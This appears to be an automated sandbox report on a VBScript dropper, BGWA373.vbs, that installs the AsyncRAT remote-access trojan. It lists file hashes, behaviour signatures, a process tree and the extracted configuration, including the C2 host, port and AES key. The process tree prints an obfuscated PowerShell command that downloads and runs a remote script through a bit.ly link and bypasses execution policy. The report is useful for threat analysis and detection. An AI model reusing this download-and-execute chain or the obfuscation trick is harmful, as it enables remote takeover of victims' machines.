Overview

overview

10

Static

static

BGWA373.vbs

windows7_x64

8

BGWA373.vbs

windows10_x64

10

Analysis

  • max time kernel
    73s
  • max time network
    148s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    24-07-2021 07:11

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    BGWA373.vbs

  • Size

    662B

  • MD5

    0aaf99120926cd036d4e12bf6bd9529e

  • SHA1

    b4c8b77fd55e4ba131d17137c5e8aeea2fae5a7a

  • SHA256

    1c80b7c0a15cb2c6685b9eb72124e4b4dd5b7f80f60acc59d0d24f863610feb0

  • SHA512

    64ee05a4b8e1a849c715a56469b95856232bc57182e4c1b6e8eeebfb2331c39811b7bbd1eea4161f3cc9dd2915b7c38a4ed18873824663a764207f42eb533570

Score
10/10
asyncratratsuricata

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

C2

newfrost.ddns.net:6666

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • aes_key

    i7qGeRW2Orm1I0pgfxYOISTcRoWU7fSK

  • anti_detection

    false

  • autorun

    false

  • bdos

    false

  • delay

    Default

  • host

    newfrost.ddns.net

  • hwid

    3

  • install_file

  • install_folder

    %AppData%

  • mutex

    AsyncMutex_6SI8OkPnk

  • pastebin_config

    null

  • port

    6666

  • version

    0.5.7B

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

    ratasyncrat
  • suricata: ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)
    suricata
  • Async RAT payload 2 IoCs
    rat
  • Blocklisted process makes network request 4 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\BGWA373.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:856
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec Bypass gdr -*;Set-Variable 5 (&(Get-Item Variable:/E*t).Value.InvokeCommand.(((Get-Item Variable:/E*t).Value.InvokeCommand|Get-Member|?{(DIR Variable:/_).Value.Name-ilike'*ts'}).Name).Invoke('*w-*ct')Net.WebClient);Set-Variable S 'https://bit.ly/3wVvbjD'; (Get-Item Variable:/E*t).Value.InvokeCommand.InvokeScript((GCI Variable:5).Value.((((GCI Variable:5).Value|Get-Member)|?{(DIR Variable:/_).Value.Name-ilike'*wn*g'}).Name).Invoke((GV S -ValueO)))
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4008
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windo 1 -noexit -exec bypass -file C:\Users\Public\ToT.ps1
        3⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3228
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"
          4⤵
            PID:1144
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1456

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Persistence

    Privilege Escalation

    Defense Evasion

    Credential Access

    Discovery

    System Information Discovery

    1
    T1082

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Public\ToT.ps1
      MD5

      8f8c2450bc9cffbd58c9f5b636352117

      SHA1

      ca15532c513d81cd0ce02d15215a92cb0de02161

      SHA256

      a0e4c425360270c90af50799d89a5f5c011d7108c92deeba06c8c1cf180ae4d1

      SHA512

      f342b2ac3c55b3a72375526c900cf2273556d81dceab97c32e0ddc1c194fffcd3418a1348431b1e1b044784354eb9b9a8d5f6987fd4397650d693c36367ed98a

      Download Submit
    • memory/1456-366-0x0000000005770000-0x0000000005771000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1456-365-0x0000000005C70000-0x0000000005C71000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1456-364-0x00000000056D0000-0x00000000056D1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1456-363-0x0000000004E90000-0x0000000004E91000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1456-354-0x000000000040C73E-mapping.dmp
      Download
    • memory/1456-353-0x0000000000400000-0x0000000000412000-memory.dmp
      Filesize

      72KB

      Download
    • memory/3228-350-0x000001D5A8826000-0x000001D5A8828000-memory.dmp
      Filesize

      8KB

      Download
    • memory/3228-329-0x000001D5A8823000-0x000001D5A8825000-memory.dmp
      Filesize

      8KB

      Download
    • memory/3228-332-0x000001D5C26D0000-0x000001D5C26D1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/3228-328-0x000001D5A8820000-0x000001D5A8822000-memory.dmp
      Filesize

      8KB

      Download
    • memory/3228-349-0x000001D5C2690000-0x000001D5C269E000-memory.dmp
      Filesize

      56KB

      Download
    • memory/3228-308-0x0000000000000000-mapping.dmp
      Download
    • memory/4008-114-0x0000000000000000-mapping.dmp
      Download
    • memory/4008-307-0x0000016705076000-0x0000016705078000-memory.dmp
      Filesize

      8KB

      Download
    • memory/4008-124-0x0000016705073000-0x0000016705075000-memory.dmp
      Filesize

      8KB

      Download
    • memory/4008-123-0x0000016705070000-0x0000016705072000-memory.dmp
      Filesize

      8KB

      Download
    • memory/4008-122-0x000001671DAD0000-0x000001671DAD1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/4008-119-0x000001671D550000-0x000001671D551000-memory.dmp
      Filesize

      4KB

      Download